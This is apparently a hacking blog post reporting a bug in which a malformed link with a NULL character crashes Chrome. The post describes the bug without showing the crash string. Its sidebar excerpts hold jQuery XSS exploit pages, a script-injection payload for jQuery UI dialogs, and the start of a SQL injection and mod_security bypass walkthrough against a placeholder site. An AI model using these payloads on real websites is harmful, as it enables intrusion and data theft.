This 16-Character Link Crashes Google's Chrome Browser

This is not Google’s finest hour: Following on the heels of news that hacking Android Lollipop is as easy as typing a long string of characters comes word that a string of 16 characters can crash Google’s Chrome web browser — and you don’t even have to type it into the address bar.

The bug was exposed by Latvia-based software engineer and security researcher Andris Atteka, who shared his discovery in a blog post. In his example, he used a 26-character string to crash Chrome. However, VentureBeat used this 16-character string, which also crashes the browser: 


To do this, all you need to do is follow one of these tricks:
  1. Type a 16-character link and hit enter
  2. Click on a 16-character link
  3. Just put your cursor on a 16-character link

Yes, that's right. You don't even have to open or click the malformed link to cause the crash, putting the cursor on the link is enough to crash your Chrome.

All the tricks mentioned above will either kill that particular Chrome tab or kill the whole Chrome browser.

The issue was discovered by security researcher Andris Atteka, who explained in his blog post that just by adding a NULL char in the URL string could crash Chrome instantly.

Atteka was able to crash the browser with a 26 character long string, which is given below:

WARNING: Don't Click or even Point your cursor to the following Link otherwise it will crash your tab or even your whole Chrome browser.


However, VentureBeat managed to crash the browser with even fewer characters — only 16 Characters in total (given below).


Here's the technical explanation given by Atteka:
"It seems to be crashing in some very old code. In the Debug build, it is hitting a DCHECK on an invalid URL in GURL, deep in some History code. Given that it is hitting a CHECK in the Release build, I do not think this is actually a security bug, but I am going to leave it as such."
The issue appears to be small but is actually serious, as it is possible for any of your friends to tweet out the link in question, and crash all Chrome users whose Twitter timeline will load that link.
In an attempt to bother you, your friends could even send this link in emails or messages.


Comments

Post a Comment

Popular posts from this blog

Location.Hash exploit || JQuery 1.11.3/1.7.2/1.6.1 Cross Site Scripting

Image
This is the code for exploiting (location.hash) JQuery for Cross Site Scripting: <html>     <head>          <title>Jquery XSS Test 1</title>                 <script type="text/javascript"                                             src=" https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js ">                 </script>                 <script>                     $(location.hash.split('#')[1]);                 </script>    </head>      <body>         Jquery DOM XSS     </body> </html> OR, <html>     <head>          <title>Jquery XSS Test 2</title>                 <script type="text/javascript"                                             src=" https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js ">                 </script>                 <
Read more

JQuery UI 1.11.4 Cross Site Scripting

Vulnerability name: XSS Reflected JQuery UI 1.11.4  I think nearly everyone gets shocked, when your Acunetix shows Cross Site Scripting in Jquery UI. But, may be many of you don’t know how to exploit it. So, here is a Code which will explain how to exploit vulnerabilities like these. Place the script on dialog function as shown in the Code below. <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head>     <title>XSS in closeText option of component ui dialog</title>     <script src="https://code.jquery.com/jquery-2.1.4.js"></script>     <script src="https://code.jquery.com/ui/1.11.4/jquery-ui.js"></script>       <script>         $(document).ready(function () {             $('#dialog').dialog({ closeText: ' <script>alert("XSS")<\/script> ' });         });     </script> </head> <body>   
Read more

Bypass Mod_Security

Image
This topic is similar as Manual Sql Injection. But mod_security are protect to hack website. You can see in this screenshot. Now In this tutorial we can learn how to bypass mod_security First we need one Target Website In My case I am using this website: http://www.target.com.pk Finding The Amount Of Columns Now that you found a vulnerable site, you need to find the amount of columns. You can do this by using the "Order By" function. Your link should now look like this: Code: http://www.target.com.pk/pages.php?ID=18 order by 1--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 2--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 3--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 4--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 5--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 6--+ (error) Finding Vulnerable Columns So now that you got the amount of columns, you're going to want to see
Read more